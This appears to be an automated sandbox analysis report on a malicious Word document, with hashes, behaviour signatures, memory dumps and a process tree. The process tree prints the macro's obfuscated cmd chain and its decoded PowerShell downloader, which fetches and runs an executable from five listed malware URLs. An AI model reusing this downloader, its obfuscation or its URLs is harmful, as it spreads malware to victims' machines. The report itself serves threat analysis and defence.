Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    31-05-2024 14:13

General

  • Target

    87484786363a6575fa1ea535b0d2b64f_JaffaCakes118.doc

  • Size

    224KB

  • MD5

    87484786363a6575fa1ea535b0d2b64f

  • SHA1

    c5e011b0547faa8bcec31ddb06a14e37e5a5aa32

  • SHA256

    6dade8c0ed4e95b82f0b104512f23ccc20849853dd2c17c46f4a468b32eae0f9

  • SHA512

    6cb2d8d8b759e10290286c749afa468d07981c22f5fa26907c7b196d843c77bff587b89bffca7f5469a790716a5abaa2a0b0e1892d8b3fff4a91cee5cb513f5c

  • SSDEEP

    3072:ZtUxagq58ghpPyjL/xSu90OoiLuDKZXfwKeljR1C:ZtUxagqOgvPAxUOmD+XfwLu

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\87484786363a6575fa1ea535b0d2b64f_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:340
    • \??\c:\windows\SysWOW64\cmd.exe
      c:\jvjqq\auozn\ffhwnvv\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set 7uKh=;'jwjzmmf'=sqtkjfj$}}{hctac}};kaerb;'clpozi'=zvcsjjd$;tcksr$ metI-ekovnI{ )00004 eg- htgnel.)tcksr$ metI-teG(( fI;'wazpp'=bapziuv$;)tcksr$ ,ddzqnoc$(eliFdaolnwoD.hljvjdk${yrt{)fflkm$ ni ddzqnoc$(hcaerof;'exe.'+liudzw$+'\'+pmet:vne$=tcksr$;'pjzljtj'=clvstjq$;'07' = liudzw$;'imvll'=trowz$;)'@'(tilpS.'POgxD0DtsUDR/ur.adamatno.www//:ptth@1s_sEWYSL28VYN/nv.spuorgnim//:ptth@N_z9uTBG53B22ZE/segaugnal/tnetnoc-pw/gro.masayevnidak//:ptth@nGSyZvaUUokGb/tnetnoc-pw/moc.recuder-oirav.www//:ptth@k_ttiW14fsGYTP/tfhos/ten.ilenosrepkilgas.liam//:ptth'=fflkm$;tneilCbeW.teN tcejbo-wen=hljvjdk$;'lzquq'=ikkbrdw$ ll%1,3-~:PMET%h%1,4-~:EMANNOISSES%r%1,5~:CILBUP%wop&&for /L %h in (648,-1,0)do set 3ue=!3ue!!7uKh:~%h,1!&&if %h==0 echo !3ue:~-649!| %TMP:~-8,-7%%CommonProgramFiles:~19,1%%LOCALAPPDATA:~-10,-9% "
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2476
      • C:\Windows\SysWOW64\cmd.exe
        CmD /V:ON/C"set 7uKh=;'jwjzmmf'=sqtkjfj$}}{hctac}};kaerb;'clpozi'=zvcsjjd$;tcksr$ metI-ekovnI{ )00004 eg- htgnel.)tcksr$ metI-teG(( fI;'wazpp'=bapziuv$;)tcksr$ ,ddzqnoc$(eliFdaolnwoD.hljvjdk${yrt{)fflkm$ ni ddzqnoc$(hcaerof;'exe.'+liudzw$+'\'+pmet:vne$=tcksr$;'pjzljtj'=clvstjq$;'07' = liudzw$;'imvll'=trowz$;)'@'(tilpS.'POgxD0DtsUDR/ur.adamatno.www//:ptth@1s_sEWYSL28VYN/nv.spuorgnim//:ptth@N_z9uTBG53B22ZE/segaugnal/tnetnoc-pw/gro.masayevnidak//:ptth@nGSyZvaUUokGb/tnetnoc-pw/moc.recuder-oirav.www//:ptth@k_ttiW14fsGYTP/tfhos/ten.ilenosrepkilgas.liam//:ptth'=fflkm$;tneilCbeW.teN tcejbo-wen=hljvjdk$;'lzquq'=ikkbrdw$ ll%1,3-~:PMET%h%1,4-~:EMANNOISSES%r%1,5~:CILBUP%wop&&for /L %h in (648,-1,0)do set 3ue=!3ue!!7uKh:~%h,1!&&if %h==0 echo !3ue:~-649!| c8D "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1808
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $wdrbkki='quqzl';$kdjvjlh=new-object Net.WebClient;$mklff='http://mail.saglikpersoneli.net/sohft/PTYGsf41Witt_k@http://www.vario-reducer.com/wp-content/bGkoUUavZySGn@http://kadinveyasam.org/wp-content/languages/EZ22B35GBTu9z_N@http://mingroups.vn/NYV82LSYWEs_s1@http://www.ontamada.ru/RDUstD0DxgOP'.Split('@');$zwort='llvmi';$wzduil = '70';$qjtsvlc='jtjlzjp';$rskct=$env:temp+'\'+$wzduil+'.exe';foreach($conqzdd in $mklff){try{$kdjvjlh.DownloadFile($conqzdd, $rskct);$vuizpab='ppzaw';If ((Get-Item $rskct).length -ge 40000) {Invoke-Item $rskct;$djjscvz='izoplc';break;}}catch{}}$jfjktqs='fmmzjwj';"
          4⤵
            PID:2756
      • C:\Windows\splwow64.exe
        C:\Windows\splwow64.exe 12288
        2⤵
          PID:548

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

        Filesize

        20KB

        MD5

        d000bf1ad9f4631cef217134fdfd2868

        SHA1

        2917c1830cfd8f7352a640154fa8548fb24da4b3

        SHA256

        626e3d2292950ebdf8dce890a9fc977916880328b31a4b62ae9143cc7314e1d9

        SHA512

        4f1156945dd2111890474c9002b6dbdad8a7f116a610db96171eea143442efc5f1970bfd065072872d6217216bf54fb6a1acc9db425e78c230a7641c5a046c9f

      • memory/340-18-0x0000000000430000-0x0000000000530000-memory.dmp

        Filesize

        1024KB

      • memory/340-15-0x0000000000430000-0x0000000000530000-memory.dmp

        Filesize

        1024KB

      • memory/340-33-0x0000000000430000-0x0000000000530000-memory.dmp

        Filesize

        1024KB

      • memory/340-72-0x0000000000430000-0x0000000000530000-memory.dmp

        Filesize

        1024KB

      • memory/340-17-0x0000000006A10000-0x0000000006B10000-memory.dmp

        Filesize

        1024KB

      • memory/340-16-0x0000000000430000-0x0000000000530000-memory.dmp

        Filesize

        1024KB

      • memory/340-14-0x0000000000430000-0x0000000000530000-memory.dmp

        Filesize

        1024KB

      • memory/340-12-0x0000000000430000-0x0000000000530000-memory.dmp

        Filesize

        1024KB

      • memory/340-11-0x0000000000430000-0x0000000000530000-memory.dmp

        Filesize

        1024KB

      • memory/340-10-0x0000000000430000-0x0000000000530000-memory.dmp

        Filesize

        1024KB

      • memory/340-9-0x0000000000430000-0x0000000000530000-memory.dmp

        Filesize

        1024KB

      • memory/340-0-0x000000002F431000-0x000000002F432000-memory.dmp

        Filesize

        4KB

      • memory/340-103-0x000000007119D000-0x00000000711A8000-memory.dmp

        Filesize

        44KB

      • memory/340-2-0x000000007119D000-0x00000000711A8000-memory.dmp

        Filesize

        44KB

      • memory/340-13-0x0000000000430000-0x0000000000530000-memory.dmp

        Filesize

        1024KB

      • memory/340-62-0x0000000000430000-0x0000000000530000-memory.dmp

        Filesize

        1024KB

      • memory/340-55-0x0000000000430000-0x0000000000530000-memory.dmp

        Filesize

        1024KB

      • memory/340-53-0x0000000000430000-0x0000000000530000-memory.dmp

        Filesize

        1024KB

      • memory/340-48-0x0000000000430000-0x0000000000530000-memory.dmp

        Filesize

        1024KB

      • memory/340-32-0x0000000000430000-0x0000000000530000-memory.dmp

        Filesize

        1024KB

      • memory/340-70-0x0000000000430000-0x0000000000530000-memory.dmp

        Filesize

        1024KB

      • memory/340-79-0x000000007119D000-0x00000000711A8000-memory.dmp

        Filesize

        44KB

      • memory/340-80-0x0000000000430000-0x0000000000530000-memory.dmp

        Filesize

        1024KB

      • memory/340-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

        Filesize

        64KB

      • memory/340-102-0x000000005FFF0000-0x0000000060000000-memory.dmp

        Filesize

        64KB

      • memory/340-71-0x0000000000430000-0x0000000000530000-memory.dmp

        Filesize

        1024KB